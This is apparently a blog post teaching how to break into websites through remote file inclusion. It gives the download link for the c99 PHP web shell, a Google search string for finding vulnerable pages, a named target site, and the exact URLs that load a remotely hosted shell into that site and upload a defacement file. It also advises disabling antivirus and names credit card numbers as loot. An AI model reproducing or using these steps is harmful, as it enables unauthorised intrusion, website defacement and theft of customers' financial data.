Hacking Exploited Websites using PHP Shells.
Downloads you need:
The PHP Shell:
CODE
http://rapidshare.com/files/151908878/c99.txt.html
A Place to Host it: http://www.100mb.com
Now, on to the tutorial
NOTE: You might want to disable your AV, it doesn't like PHP Shells
First of all, you need to Download the PHP shell I gave you. Change the file extension from .php to .txt. You will have something like this:
Now, we need to host the Shell on a free hosting site. I use 110MB.com. I won't go into detail on how to upload it, Unless requested.
so for this tutorial, I recommend you get your own.
Now, onto the good stuff.
Now we must find an exploitable site. You can easily find one by putting this in Google:
CODE
inurl:"index.php?file=contact.php"
Note- You can remove Contact for more results
Okay, we will use this site for an example:
CODE
p0rnteddy.com
To make sure the site is exploitable, we will try to run google in it.
It's rather simple, all you do it remove the "tagwall.php" part, and type "http://www.google.com", like so:
CODE
http://p0rnteddy.com/?page=http://www.google.com
If you see somewhat of a page that looks like Google, congratulations, you have found an exploitable site! This is what you should see:
Now we run the PHP Shell in it. Simply replace Google's URL and replace it with my Shell, this is what your URL should look like:
CODE
http://p0rnteddy.com/?page=http://pcarson92.110mb.com/c99.txt
Okay, now we're in. This is what you should see-
I advise you don't mess with the Index.html, you can get in legal trouble. But we're going to do something harmful, but cool. Make a .txt file with what you want the page to say. Upload it here, at the bottom of the page-
Click browse, select your .txt file, and Click "Upload". Your .txt file is now on their database. To see your .txt file, go here:
CODE
http://p0rnteddy.com/NAME OF YOUR FILE.txt
For example, here is mine:
CODE
http://p0rnteddy.com/Owned.txt
You have now hacked the site. Good job. You now have access to pretty much everything on the site. This can be useful- CC Numbers, etc. I may post how to do more things later.
ليست هناك تعليقات:
إرسال تعليق